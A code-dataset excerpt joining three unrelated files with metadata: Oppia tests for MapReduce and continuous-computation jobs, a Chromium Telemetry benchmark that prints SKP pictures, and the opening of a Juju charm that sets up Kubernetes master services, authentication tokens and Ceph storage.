return [exp_models.ExplorationModel, exp_models.ExplorationRightsModel]
@staticmethod
def map(item):
yield ('sum', 1)
@staticmethod
def reduce(key, values):
yield [key, sum([int(value) for value in values])]
class TwoClassesMapReduceJobIntegrationTests(test_utils.GenericTestBase):
"""Tests MapReduce jobs using two classes end-to-end."""
def setUp(self):
"""Create an exploration so that there is something to count."""
super(TwoClassesMapReduceJobIntegrationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
# Note that this ends up creating an entry in the
# ExplorationRightsModel as well.
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_count_entities(self):
self.assertEqual(exp_models.ExplorationModel.query().count(), 1)
self.assertEqual(exp_models.ExplorationRightsModel.query().count(), 1)
job_id = TwoClassesMapReduceJobManager.create_new()
TwoClassesMapReduceJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
TwoClassesMapReduceJobManager.get_output(job_id), [['sum', 2]])
self.assertEqual(
TwoClassesMapReduceJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
class StartExplorationRealtimeModel(
jobs.BaseRealtimeDatastoreClassForContinuousComputations):
count = ndb.IntegerProperty(default=0)
class StartExplorationMRJobManager(
jobs.BaseMapReduceJobManagerForContinuousComputations):
@classmethod
def _get_continuous_computation_class(cls):
return StartExplorationEventCounter
@classmethod
def entity_classes_to_map_over(cls):
return [stats_models.StartExplorationEventLogEntryModel]
@staticmethod
def map(item):
current_class = StartExplorationMRJobManager
if current_class._entity_created_before_job_queued(item): # pylint: disable=protected-access
yield (item.exploration_id, {
'event_type': item.event_type,
})
@staticmethod
def reduce(key, stringified_values):
started_count = 0
for value_str in stringified_values:
value = ast.literal_eval(value_str)
if value['event_type'] == feconf.EVENT_TYPE_START_EXPLORATION:
started_count += 1
stats_models.ExplorationAnnotationsModel(
id=key, num_starts=started_count).put()
class StartExplorationEventCounter(jobs.BaseContinuousComputationManager):
"""A continuous-computation job that counts 'start exploration' events.
This class should only be used in tests.
"""
@classmethod
def get_event_types_listened_to(cls):
return [feconf.EVENT_TYPE_START_EXPLORATION]
@classmethod
def _get_realtime_datastore_class(cls):
return StartExplorationRealtimeModel
@classmethod
def _get_batch_job_manager_class(cls):
return StartExplorationMRJobManager
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
"""Override this method so that it does not immediately start a
new MapReduce job. Non-test subclasses should not do this."""
pass
@classmethod
def _handle_incoming_event(
cls, active_realtime_layer, event_type, exp_id, unused_exp_version,
unused_state_name, unused_session_id, unused_params,
unused_play_type):
def _increment_counter():
realtime_class = cls._get_realtime_datastore_class()
realtime_model_id = realtime_class.get_realtime_id(
active_realtime_layer, exp_id)
realtime_model = realtime_class.get(
realtime_model_id, strict=False)
if realtime_model is None:
realtime_class(
id=realtime_model_id, count=1,
realtime_layer=active_realtime_layer).put()
else:
realtime_model.count += 1
realtime_model.put()
transaction_services.run_in_transaction(_increment_counter)
# Public query method.
@classmethod
def get_count(cls, exploration_id):
"""Return the number of 'start exploration' events received.
Answers the query by combining the existing MR job output and the
active realtime_datastore_class.
"""
mr_model = stats_models.ExplorationAnnotationsModel.get(
exploration_id, strict=False)
realtime_model = cls._get_realtime_datastore_class().get(
cls.get_active_realtime_layer_id(exploration_id), strict=False)
answer = 0
if mr_model is not None:
answer += mr_model.num_starts
if realtime_model is not None:
answer += realtime_model.count
return answer
class ContinuousComputationTests(test_utils.GenericTestBase):
"""Tests continuous computations for 'start exploration' events."""
EXP_ID = 'exp_id'
ALL_CC_MANAGERS_FOR_TESTS = [
StartExplorationEventCounter]
def setUp(self):
"""Create an exploration and register the event listener manually."""
super(ContinuousComputationTests, self).setUp()
exploration = exp_domain.Exploration.create_default_exploration(
self.EXP_ID)
exp_services.save_new_exploration('owner_id', exploration)
self.process_and_flush_pending_tasks()
def test_continuous_computation_workflow(self):
"""An integration test for continuous computations."""
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
self.ALL_CC_MANAGERS_FOR_TESTS
):
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
# Record an event. This will put the event in the task queue.
event_services.StartExplorationEventHandler.record(
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
{}, feconf.PLAY_TYPE_NORMAL)
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
# When the task queue is flushed, the data is recorded in the two
# realtime layers.
self.process_and_flush_pending_tasks()
self.assertEqual(self.count_jobs_in_taskqueue(), 0)
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
self.assertEqual(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID).count, 1)
self.assertEqual(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID).count, 1)
# The batch job has not run yet, so no entity for self.EXP_ID will
# have been created in the batch model yet.
with self.assertRaises(base_models.BaseModel.EntityNotFoundError):
stats_models.ExplorationAnnotationsModel.get(self.EXP_ID)
# Launch the batch computation.
StartExplorationEventCounter.start_computation()
# Data in realtime layer 0 is still there.
self.assertEqual(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID).count, 1)
# Data in realtime layer 1 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID, strict=False))
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
stats_models.ExplorationAnnotationsModel.get(
self.EXP_ID).num_starts, 1)
# The overall count is still 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# Data in realtime layer 0 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID, strict=False))
# Data in realtime layer 1 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID, strict=False))
def test_events_coming_in_while_batch_job_is_running(self):
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
self.ALL_CC_MANAGERS_FOR_TESTS
):
# Currently no events have been recorded.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
# Enqueue the batch computation. (It is running on 0 events.)
StartExplorationEventCounter._kickoff_batch_job() # pylint: disable=protected-access
# Record an event while this job is in the queue. Simulate
# this by directly calling on_incoming_event(), because using
# StartExplorationEventHandler.record() would just put the event
# in the task queue, which we don't want to flush yet.
event_services.StartExplorationEventHandler._handle_event( # pylint: disable=protected-access
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
{}, feconf.PLAY_TYPE_NORMAL)
StartExplorationEventCounter.on_incoming_event(
event_services.StartExplorationEventHandler.EVENT_TYPE,
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id',
{}, feconf.PLAY_TYPE_NORMAL)
# The overall count is now 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# Finish the job.
self.process_and_flush_pending_tasks()
# When the batch job completes, the overall count is still 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# The batch job result should still be 0, since the event arrived
# after the batch job started.
with self.assertRaises(base_models.BaseModel.EntityNotFoundError):
stats_models.ExplorationAnnotationsModel.get(self.EXP_ID)
# TODO(sll): When we have some concrete ContinuousComputations running in
# production, add an integration test to ensure that the registration of event
# handlers in the main codebase is happening correctly.
| apache-2.0 | -1,856,952,554,176,331,000 | 39.608284 | 112 | 0.665676 | false |
lihui7115/ChromiumGStreamerBackend | tools/perf/benchmarks/skpicture_printer.py | 13 | 1709 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from core import perf_benchmark
from telemetry import benchmark
from telemetry.core import discover
from telemetry import story
from measurements import skpicture_printer
def _MatchPageSetName(story_set_name, story_set_base_dir):
story_sets = discover.DiscoverClasses(story_set_base_dir, story_set_base_dir,
story.StorySet).values()
for s in story_sets:
if story_set_name == s.Name():
return s
return None
@benchmark.Disabled
class SkpicturePrinter(perf_benchmark.PerfBenchmark):
@classmethod
def AddBenchmarkCommandLineArgs(cls, parser):
parser.add_option('--page-set-name', action='store', type='string')
parser.add_option('--page-set-base-dir', action='store', type='string')
parser.add_option('-s', '--skp-outdir',
help='Output directory for the SKP files')
@classmethod
def ProcessCommandLineArgs(cls, parser, args):
if not args.page_set_name:
parser.error('Please specify --page-set-name')
if not args.page_set_base_dir:
parser.error('Please specify --page-set-base-dir')
if not args.skp_outdir:
parser.error('Please specify --skp-outdir')
@classmethod
def Name(cls):
return 'skpicture_printer'
def CreatePageTest(self, options):
return skpicture_printer.SkpicturePrinter(options.skp_outdir)
def CreateStorySet(self, options):
story_set_class = _MatchPageSetName(options.page_set_name,
options.page_set_base_dir)
return story_set_class()
| bsd-3-clause | 3,187,680,469,179,440,000 | 33.18 | 79 | 0.688122 | false |
pwittrock/reference-docs | vendor/k8s.io/kubernetes/cluster/juju/layers/kubernetes-master/reactive/kubernetes_master.py | 21 | 37137 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import os
import re
import random
import shutil
import socket
import string
import json
import ipaddress
import charms.leadership
from shlex import split
from subprocess import check_call
from subprocess import check_output
from subprocess import CalledProcessError
from charms import layer
from charms.layer import snap
from charms.reactive import hook
from charms.reactive import remove_state
from charms.reactive import set_state
from charms.reactive import is_state
from charms.reactive import when, when_any, when_not
from charms.reactive.helpers import data_changed, any_file_changed
from charms.kubernetes.common import get_version
from charms.kubernetes.common import retry
from charms.kubernetes.flagmanager import FlagManager
from charmhelpers.core import hookenv
from charmhelpers.core import host
from charmhelpers.core import unitdata
from charmhelpers.core.host import service_stop
from charmhelpers.core.templating import render
from charmhelpers.fetch import apt_install
from charmhelpers.contrib.charmsupport import nrpe
# Override the default nagios shortname regex to allow periods, which we
# need because our bin names contain them (e.g. 'snap.foo.daemon'). The
# default regex in charmhelpers doesn't allow periods, but nagios itself does.
nrpe.Check.shortname_re = '[\.A-Za-z0-9-_]+$'
os.environ['PATH'] += os.pathsep + os.path.join(os.sep, 'snap', 'bin')
def service_cidr():
''' Return the charm's service-cidr config '''
db = unitdata.kv()
frozen_cidr = db.get('kubernetes-master.service-cidr')
return frozen_cidr or hookenv.config('service-cidr')
def freeze_service_cidr():
''' Freeze the service CIDR. Once the apiserver has started, we can no
longer safely change this value. '''
db = unitdata.kv()
db.set('kubernetes-master.service-cidr', service_cidr())
@hook('upgrade-charm')
def reset_states_for_delivery():
'''An upgrade charm event was triggered by Juju, react to that here.'''
migrate_from_pre_snaps()
install_snaps()
set_state('reconfigure.authentication.setup')
remove_state('authentication.setup')
def rename_file_idempotent(source, destination):
if os.path.isfile(source):
os.rename(source, destination)
def migrate_from_pre_snaps():
# remove old states
remove_state('kubernetes.components.installed')
remove_state('kubernetes.dashboard.available')
remove_state('kube-dns.available')
remove_state('kubernetes-master.app_version.set')
# disable old services
services = ['kube-apiserver',
'kube-controller-manager',
'kube-scheduler']
for service in services:
hookenv.log('Stopping {0} service.'.format(service))
host.service_stop(service)
# rename auth files
os.makedirs('/root/cdk', exist_ok=True)
rename_file_idempotent('/etc/kubernetes/serviceaccount.key',
'/root/cdk/serviceaccount.key')
rename_file_idempotent('/srv/kubernetes/basic_auth.csv',
'/root/cdk/basic_auth.csv')
rename_file_idempotent('/srv/kubernetes/known_tokens.csv',
'/root/cdk/known_tokens.csv')
# cleanup old files
files = [
"/lib/systemd/system/kube-apiserver.service",
"/lib/systemd/system/kube-controller-manager.service",
"/lib/systemd/system/kube-scheduler.service",
"/etc/default/kube-defaults",
"/etc/default/kube-apiserver.defaults",
"/etc/default/kube-controller-manager.defaults",
"/etc/default/kube-scheduler.defaults",
"/srv/kubernetes",
"/home/ubuntu/kubectl",
"/usr/local/bin/kubectl",
"/usr/local/bin/kube-apiserver",
"/usr/local/bin/kube-controller-manager",
"/usr/local/bin/kube-scheduler",
"/etc/kubernetes"
]
for file in files:
if os.path.isdir(file):
hookenv.log("Removing directory: " + file)
shutil.rmtree(file)
elif os.path.isfile(file):
hookenv.log("Removing file: " + file)
os.remove(file)
# clear the flag managers
FlagManager('kube-apiserver').destroy_all()
FlagManager('kube-controller-manager').destroy_all()
FlagManager('kube-scheduler').destroy_all()
def install_snaps():
channel = hookenv.config('channel')
hookenv.status_set('maintenance', 'Installing kubectl snap')
snap.install('kubectl', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kube-apiserver snap')
snap.install('kube-apiserver', channel=channel)
hookenv.status_set('maintenance',
'Installing kube-controller-manager snap')
snap.install('kube-controller-manager', channel=channel)
hookenv.status_set('maintenance', 'Installing kube-scheduler snap')
snap.install('kube-scheduler', channel=channel)
hookenv.status_set('maintenance', 'Installing cdk-addons snap')
snap.install('cdk-addons', channel=channel)
set_state('kubernetes-master.snaps.installed')
remove_state('kubernetes-master.components.started')
@when('config.changed.channel')
def channel_changed():
install_snaps()
@when('config.changed.client_password', 'leadership.is_leader')
def password_changed():
"""Handle password change via the charms config."""
password = hookenv.config('client_password')
if password == "" and is_state('client.password.initialised'):
# password_changed is called during an upgrade. Nothing to do.
return
elif password == "":
# Password not initialised
password = token_generator()
setup_basic_auth(password, "admin", "admin")
set_state('reconfigure.authentication.setup')
remove_state('authentication.setup')
set_state('client.password.initialised')
@when('cni.connected')
@when_not('cni.configured')
def configure_cni(cni):
''' Set master configuration on the CNI relation. This lets the CNI
subordinate know that we're the master so it can respond accordingly. '''
cni.set_config(is_master=True, kubeconfig_path='')
@when('leadership.is_leader')
@when_not('authentication.setup')
def setup_leader_authentication():
'''Setup basic authentication and token access for the cluster.'''
api_opts = FlagManager('kube-apiserver')
controller_opts = FlagManager('kube-controller-manager')
service_key = '/root/cdk/serviceaccount.key'
basic_auth = '/root/cdk/basic_auth.csv'
known_tokens = '/root/cdk/known_tokens.csv'
api_opts.add('basic-auth-file', basic_auth)
api_opts.add('token-auth-file', known_tokens)
hookenv.status_set('maintenance', 'Rendering authentication templates.')
keys = [service_key, basic_auth, known_tokens]
# Try first to fetch data from an old leadership broadcast.
if not get_keys_from_leader(keys) \
or is_state('reconfigure.authentication.setup'):
last_pass = get_password('basic_auth.csv', 'admin')
setup_basic_auth(last_pass, 'admin', 'admin')
if not os.path.isfile(known_tokens):
setup_tokens(None, 'admin', 'admin')
setup_tokens(None, 'kubelet', 'kubelet')
setup_tokens(None, 'kube_proxy', 'kube_proxy')
# Generate the default service account token key
os.makedirs('/root/cdk', exist_ok=True)
if not os.path.isfile(service_key):
cmd = ['openssl', 'genrsa', '-out', service_key,
'2048']
check_call(cmd)
remove_state('reconfigure.authentication.setup')
api_opts.add('service-account-key-file', service_key)
controller_opts.add('service-account-private-key-file', service_key)
# read service account key for syndication
leader_data = {}
for f in [known_tokens, basic_auth, service_key]:
with open(f, 'r') as fp:
leader_data[f] = fp.read()
# this is slightly opaque, but we are sending file contents under its file
# path as a key.
# eg:
# {'/root/cdk/serviceaccount.key': 'RSA:2471731...'}
charms.leadership.leader_set(leader_data)
remove_state('kubernetes-master.components.started')
set_state('authentication.setup')
@when_not('leadership.is_leader')
def setup_non_leader_authentication():
service_key = '/root/cdk/serviceaccount.key'
basic_auth = '/root/cdk/basic_auth.csv'
known_tokens = '/root/cdk/known_tokens.csv'
keys = [service_key, basic_auth, known_tokens]
# The source of truth for non-leaders is the leader.
# Therefore we overwrite_local with whatever the leader has.
if not get_keys_from_leader(keys, overwrite_local=True):
# the keys were not retrieved. Non-leaders have to retry.
return
if not any_file_changed(keys) and is_state('authentication.setup'):
# No change detected and we have already setup the authentication
return
hookenv.status_set('maintenance', 'Rendering authentication templates.')
api_opts = FlagManager('kube-apiserver')
api_opts.add('basic-auth-file', basic_auth)
api_opts.add('token-auth-file', known_tokens)
api_opts.add('service-account-key-file', service_key)
controller_opts = FlagManager('kube-controller-manager')
controller_opts.add('service-account-private-key-file', service_key)
remove_state('kubernetes-master.components.started')
set_state('authentication.setup')
def get_keys_from_leader(keys, overwrite_local=False):
"""
Gets the broadcasted keys from the leader and stores them in
the corresponding files.
Args:
keys: list of keys. Keys are actually files on the FS.
Returns: True if all key were fetched, False if not.
"""
# This races with other codepaths, and seems to require being created first
# This block may be extracted later, but for now seems to work as intended
os.makedirs('/root/cdk', exist_ok=True)
for k in keys:
# If the path does not exist, assume we need it
if not os.path.exists(k) or overwrite_local:
# Fetch data from leadership broadcast
contents = charms.leadership.leader_get(k)
# Default to logging the warning and wait for leader data to be set
if contents is None:
msg = "Waiting on leaders crypto keys."
hookenv.status_set('waiting', msg)
hookenv.log('Missing content for file {}'.format(k))
return False
# Write out the file and move on to the next item
with open(k, 'w+') as fp:
fp.write(contents)
return True
@when('kubernetes-master.snaps.installed')
def set_app_version():
''' Declare the application version to juju '''
version = check_output(['kube-apiserver', '--version'])
hookenv.application_version_set(version.split(b' v')[-1].rstrip())
@when('cdk-addons.configured', 'kube-api-endpoint.available',
'kube-control.connected')
def idle_status(kube_api, kube_control):
''' Signal at the end of the run that we are running. '''
if not all_kube_system_pods_running():
hookenv.status_set('waiting', 'Waiting for kube-system pods to start')
elif hookenv.config('service-cidr') != service_cidr():
msg = 'WARN: cannot change service-cidr, still using ' + service_cidr()
hookenv.status_set('active', msg)
else:
# All services should be up and running at this point. Double-check...
failing_services = master_services_down()
if len(failing_services) == 0:
hookenv.status_set('active', 'Kubernetes master running.')
else:
msg = 'Stopped services: {}'.format(','.join(failing_services))
hookenv.status_set('blocked', msg)
def master_services_down():
"""Ensure master services are up and running.
Return: list of failing services"""
services = ['kube-apiserver',
'kube-controller-manager',
'kube-scheduler']
failing_services = []
for service in services:
daemon = 'snap.{}.daemon'.format(service)
if not host.service_running(daemon):
failing_services.append(service)
return failing_services
@when('etcd.available', 'tls_client.server.certificate.saved',
'authentication.setup')
@when_not('kubernetes-master.components.started')
def start_master(etcd):
'''Run the Kubernetes master components.'''
hookenv.status_set('maintenance',
'Configuring the Kubernetes master services.')
freeze_service_cidr()
if not etcd.get_connection_string():
# etcd is not returning a connection string. This hapens when
# the master unit disconnects from etcd and is ready to terminate.
# No point in trying to start master services and fail. Just return.
return
handle_etcd_relation(etcd)
configure_master_services()
hookenv.status_set('maintenance',
'Starting the Kubernetes master services.')
services = ['kube-apiserver',
'kube-controller-manager',
'kube-scheduler']
for service in services:
host.service_restart('snap.%s.daemon' % service)
hookenv.open_port(6443)
set_state('kubernetes-master.components.started')
@when('etcd.available')
def etcd_data_change(etcd):
''' Etcd scale events block master reconfiguration due to the
kubernetes-master.components.started state. We need a way to
handle these events consistenly only when the number of etcd
units has actually changed '''
# key off of the connection string
connection_string = etcd.get_connection_string()
# If the connection string changes, remove the started state to trigger
# handling of the master components
if data_changed('etcd-connect', connection_string):
remove_state('kubernetes-master.components.started')
@when('kube-control.connected')
@when('cdk-addons.configured')
def send_cluster_dns_detail(kube_control):
''' Send cluster DNS info '''
# Note that the DNS server doesn't necessarily exist at this point. We know
# where we're going to put it, though, so let's send the info anyway.
dns_ip = get_dns_ip()
kube_control.set_dns(53, hookenv.config('dns_domain'), dns_ip)
@when('kube-control.auth.requested')
@when('authentication.setup')
@when('leadership.is_leader')
def send_tokens(kube_control):
"""Send the tokens to the workers."""
kubelet_token = get_token('kubelet')
proxy_token = get_token('kube_proxy')
admin_token = get_token('admin')
# Send the data
requests = kube_control.auth_user()
for request in requests:
kube_control.sign_auth_request(request[0], kubelet_token,
proxy_token, admin_token)
@when_not('kube-control.connected')
def missing_kube_control():
"""Inform the operator master is waiting for a relation to workers.
If deploying via bundle this won't happen, but if operator is upgrading a
a charm in a deployment that pre-dates the kube-control relation, it'll be
missing.
"""
hookenv.status_set('blocked', 'Waiting for workers.')
@when('kube-api-endpoint.available')
def push_service_data(kube_api):
''' Send configuration to the load balancer, and close access to the
public interface '''
kube_api.configure(port=6443)
@when('certificates.available')
def send_data(tls):
'''Send the data that is required to create a server certificate for
this server.'''
# Use the public ip of this unit as the Common Name for the certificate.
common_name = hookenv.unit_public_ip()
# Get the SDN gateway based on the cidr address.
kubernetes_service_ip = get_kubernetes_service_ip()
domain = hookenv.config('dns_domain')
# Create SANs that the tls layer will add to the server cert.
sans = [
hookenv.unit_public_ip(),
hookenv.unit_private_ip(),
socket.gethostname(),
kubernetes_service_ip,
'kubernetes',
'kubernetes.{0}'.format(domain),
'kubernetes.default',
'kubernetes.default.svc',
'kubernetes.default.svc.{0}'.format(domain)
]
# Create a path safe name by removing path characters from the unit name.
certificate_name = hookenv.local_unit().replace('/', '_')
# Request a server cert with this information.
tls.request_server_cert(common_name, sans, certificate_name)
@when('kubernetes-master.components.started')
def configure_cdk_addons():
''' Configure CDK addons '''
remove_state('cdk-addons.configured')
dbEnabled = str(hookenv.config('enable-dashboard-addons')).lower()
args = [
'arch=' + arch(),
'dns-ip=' + get_dns_ip(),
'dns-domain=' + hookenv.config('dns_domain'),
'enable-dashboard=' + dbEnabled
]
check_call(['snap', 'set', 'cdk-addons'] + args)
if not addons_ready():
hookenv.status_set('waiting', 'Waiting to retry addon deployment')
remove_state('cdk-addons.configured')
return
set_state('cdk-addons.configured')
@retry(times=3, delay_secs=20)
def addons_ready():
"""
Test if the add ons got installed
Returns: True is the addons got applied
"""
try:
check_call(['cdk-addons.apply'])
return True
except CalledProcessError:
hookenv.log("Addons are not ready yet.")
return False
@when('loadbalancer.available', 'certificates.ca.available',
'certificates.client.cert.available', 'authentication.setup')
def loadbalancer_kubeconfig(loadbalancer, ca, client):
# Get the potential list of loadbalancers from the relation object.
hosts = loadbalancer.get_addresses_ports()
# Get the public address of loadbalancers so users can access the cluster.
address = hosts[0].get('public-address')
# Get the port of the loadbalancer so users can access the cluster.
port = hosts[0].get('port')
server = 'https://{0}:{1}'.format(address, port)
build_kubeconfig(server)
@when('certificates.ca.available', 'certificates.client.cert.available',
'authentication.setup')
@when_not('loadbalancer.available')
def create_self_config(ca, client):
'''Create a kubernetes configuration for the master unit.'''
server = 'https://{0}:{1}'.format(hookenv.unit_get('public-address'), 6443)
build_kubeconfig(server)
@when('ceph-storage.available')
def ceph_state_control(ceph_admin):
''' Determine if we should remove the state that controls the re-render
and execution of the ceph-relation-changed event because there
are changes in the relationship data, and we should re-render any
configs, keys, and/or service pre-reqs '''
ceph_relation_data = {
'mon_hosts': ceph_admin.mon_hosts(),
'fsid': ceph_admin.fsid(),
'auth_supported': ceph_admin.auth(),
'hostname': socket.gethostname(),
'key': ceph_admin.key()
}
# Re-execute the rendering if the data has changed.
if data_changed('ceph-config', ceph_relation_data):
remove_state('ceph-storage.configured')
@when('ceph-storage.available')
@when_not('ceph-storage.configured')
def ceph_storage(ceph_admin):
'''Ceph on kubernetes will require a few things - namely a ceph
configuration, and the ceph secret key file used for authentication.
This method will install the client package, and render the requisit files
in order to consume the ceph-storage relation.'''
ceph_context = {
'mon_hosts': ceph_admin.mon_hosts(),
'fsid': ceph_admin.fsid(),
'auth_supported': ceph_admin.auth(),
'use_syslog': "true",
'ceph_public_network': '',
'ceph_cluster_network': '',
'loglevel': 1,
'hostname': socket.gethostname(),
}
# Install the ceph common utilities.
apt_install(['ceph-common'], fatal=True)
etc_ceph_directory = '/etc/ceph'
if not os.path.isdir(etc_ceph_directory):
os.makedirs(etc_ceph_directory)
charm_ceph_conf = os.path.join(etc_ceph_directory, 'ceph.conf')
# Render the ceph configuration from the ceph conf template
render('ceph.conf', charm_ceph_conf, ceph_context)
# The key can rotate independently of other ceph config, so validate it
admin_key = os.path.join(etc_ceph_directory,
'ceph.client.admin.keyring')
try:
with open(admin_key, 'w') as key_file:
key_file.write("[client.admin]\n\tkey = {}\n".format(
ceph_admin.key()))
except IOError as err:
hookenv.log("IOError writing admin.keyring: {}".format(err))
# Enlist the ceph-admin key as a kubernetes secret
if ceph_admin.key():
encoded_key = base64.b64encode(ceph_admin.key().encode('utf-8'))
else:
# We didn't have a key, and cannot proceed. Do not set state and
# allow this method to re-execute
return
context = {'secret': encoded_key.decode('ascii')}
render('ceph-secret.yaml', '/tmp/ceph-secret.yaml', context)
try:
# At first glance this is deceptive. The apply stanza will create if
# it doesn't exist, otherwise it will update the entry, ensuring our
# ceph-secret is always reflective of what we have in /etc/ceph
# assuming we have invoked this anytime that file would change.
cmd = ['kubectl', 'apply', '-f', '/tmp/ceph-secret.yaml']
check_call(cmd)
os.remove('/tmp/ceph-secret.yaml')
except:
# the enlistment in kubernetes failed, return and prepare for re-exec
return
# when complete, set a state relating to configuration of the storage
# backend that will allow other modules to hook into this and verify we
# have performed the necessary pre-req steps to interface with a ceph
# deployment.
set_state('ceph-storage.configured')
@when('nrpe-external-master.available')
@when_not('nrpe-external-master.initial-config')
def initial_nrpe_config(nagios=None):
set_state('nrpe-external-master.initial-config')
update_nrpe_config(nagios)
@when('kubernetes-master.components.started')
@when('nrpe-external-master.available')
@when_any('config.changed.nagios_context',
'config.changed.nagios_servicegroups')
def update_nrpe_config(unused=None):
services = (
'snap.kube-apiserver.daemon',
'snap.kube-controller-manager.daemon',
'snap.kube-scheduler.daemon'
)
hostname = nrpe.get_nagios_hostname()
current_unit = nrpe.get_nagios_unit_name()
nrpe_setup = nrpe.NRPE(hostname=hostname)
nrpe.add_init_service_checks(nrpe_setup, services, current_unit)
nrpe_setup.write()
@when_not('nrpe-external-master.available')
@when('nrpe-external-master.initial-config')
def remove_nrpe_config(nagios=None):
remove_state('nrpe-external-master.initial-config')
# List of systemd services for which the checks will be removed
services = (
'snap.kube-apiserver.daemon',
'snap.kube-controller-manager.daemon',
'snap.kube-scheduler.daemon'
)
# The current nrpe-external-master interface doesn't handle a lot of logic,
# use the charm-helpers code for now.
hostname = nrpe.get_nagios_hostname()
nrpe_setup = nrpe.NRPE(hostname=hostname)
for service in services:
nrpe_setup.remove_check(shortname=service)
def is_privileged():
"""Return boolean indicating whether or not to set allow-privileged=true.
"""
privileged = hookenv.config('allow-privileged')
if privileged == 'auto':
return is_state('kubernetes-master.gpu.enabled')
else:
return privileged == 'true'
@when('config.changed.allow-privileged')
@when('kubernetes-master.components.started')
def on_config_allow_privileged_change():
"""React to changed 'allow-privileged' config value.
"""
remove_state('kubernetes-master.components.started')
remove_state('config.changed.allow-privileged')
@when('kube-control.gpu.available')
@when('kubernetes-master.components.started')
@when_not('kubernetes-master.gpu.enabled')
def on_gpu_available(kube_control):
"""The remote side (kubernetes-worker) is gpu-enabled.
We need to run in privileged mode.
"""
config = hookenv.config()
if config['allow-privileged'] == "false":
hookenv.status_set(
'active',
'GPUs available. Set allow-privileged="auto" to enable.'
)
return
remove_state('kubernetes-master.components.started')
set_state('kubernetes-master.gpu.enabled')
@when('kubernetes-master.gpu.enabled')
@when_not('kubernetes-master.privileged')
def disable_gpu_mode():
"""We were in gpu mode, but the operator has set allow-privileged="false",
so we can't run in gpu mode anymore.
"""
remove_state('kubernetes-master.gpu.enabled')
@hook('stop')
def shutdown():
""" Stop the kubernetes master services
"""
service_stop('snap.kube-apiserver.daemon')
service_stop('snap.kube-controller-manager.daemon')
service_stop('snap.kube-scheduler.daemon')
def arch():
'''Return the package architecture as a string. Raise an exception if the
architecture is not supported by kubernetes.'''
# Get the package architecture for this system.
architecture = check_output(['dpkg', '--print-architecture']).rstrip()
# Convert the binary result into a string.
architecture = architecture.decode('utf-8')
return architecture
def build_kubeconfig(server):
'''Gather the relevant data for Kubernetes configuration objects and create
a config object with that information.'''
# Get the options from the tls-client layer.
layer_options = layer.options('tls-client')
# Get all the paths to the tls information required for kubeconfig.
ca = layer_options.get('ca_certificate_path')
ca_exists = ca and os.path.isfile(ca)
client_pass = get_password('basic_auth.csv', 'admin')
# Do we have everything we need?
if ca_exists and client_pass:
# Create an absolute path for the kubeconfig file.
kubeconfig_path = os.path.join(os.sep, 'home', 'ubuntu', 'config')
# Create the kubeconfig on this system so users can access the cluster.
create_kubeconfig(kubeconfig_path, server, ca,
user='admin', password=client_pass)
# Make the config file readable by the ubuntu users so juju scp works.
cmd = ['chown', 'ubuntu:ubuntu', kubeconfig_path]
check_call(cmd)
def create_kubeconfig(kubeconfig, server, ca, key=None, certificate=None,
user='ubuntu', context='juju-context',
cluster='juju-cluster', password=None, token=None):
'''Create a configuration for Kubernetes based on path using the supplied
arguments for values of the Kubernetes server, CA, key, certificate, user
context and cluster.'''
if not key and not certificate and not password and not token:
raise ValueError('Missing authentication mechanism.')
# token and password are mutually exclusive. Error early if both are
# present. The developer has requested an impossible situation.
# see: kubectl config set-credentials --help
if token and password:
raise ValueError('Token and Password are mutually exclusive.')
# Create the config file with the address of the master server.
cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \
'--server={2} --certificate-authority={3} --embed-certs=true'
check_call(split(cmd.format(kubeconfig, cluster, server, ca)))
# Delete old users
cmd = 'kubectl config --kubeconfig={0} unset users'
check_call(split(cmd.format(kubeconfig)))
# Create the credentials using the client flags.
cmd = 'kubectl config --kubeconfig={0} ' \
'set-credentials {1} '.format(kubeconfig, user)
if key and certificate:
cmd = '{0} --client-key={1} --client-certificate={2} '\
'--embed-certs=true'.format(cmd, key, certificate)
if password:
cmd = "{0} --username={1} --password={2}".format(cmd, user, password)
